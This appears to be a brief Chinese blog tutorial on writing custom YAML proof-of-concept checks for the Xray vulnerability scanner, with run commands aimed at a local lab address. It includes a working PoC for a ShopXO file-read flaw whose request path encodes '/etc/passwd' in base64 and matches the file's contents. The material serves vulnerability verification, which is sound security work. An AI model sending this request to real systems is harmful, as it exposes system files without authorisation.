Xray poc简单编写
Xray是什么
xray 是一款功能强大的安全评估工具,由多名经验丰富的一线安全从业者呕心打造而成,主要特性有:
检测速度快。发包速度快; 漏洞检测算法效率高。
支持范围广。大至 OWASP Top 10 通用漏洞检测,小至各种 CMS 框架 POC,均可以支持。
代码质量高。编写代码的人员素质高, 通过 Code Review、单元测试、集成测试等多层验证来提高代码可靠性。
高级可定制。通过配置文件暴露了引擎的各种参数,通过修改配置文件可以客制化功能。
安全无威胁。xray 定位为一款安全辅助评估工具,而不是攻击工具,内置的所有 payload 和 poc 均为无害化检查。
#Github下载:https://github.com/chaitin/xray/releases (国外速度快)#CT stack下载:https://stack.chaitin.com/tool/detail?id=1 (国内速度快)#下载对应系统的版本后,来查看下 xray 的版本号。#参考https://docs.xray.coolhttps://stack.chaitin.com/tool/detail/1
✨Xray 漏洞验证
#写yml poc文件,单个url检测./xray_darwin_amd64 webscan --plugins phantasm --poc ./111.yml --url http://192.168.130.130:47984/#开启debug看响应包./xray_darwin_amd64 --log-level debug webscan --plugins phantasm --poc ./111.yml --url http://192.168.130.130:47984/
shopxo 文件读取:保存成111.yml
name: poc-yaml-testtransport: httprules:r0:request:method: GETpath: /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q=expression: >-response.status == 200 &&"nologin:.*?:[0-9]*:[0-9]*:".bmatches(response.body)expression: r0()detail:author: aa11lelinks:- test
原文始发于微信公众号(echoabced):Xray poc简单编写
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论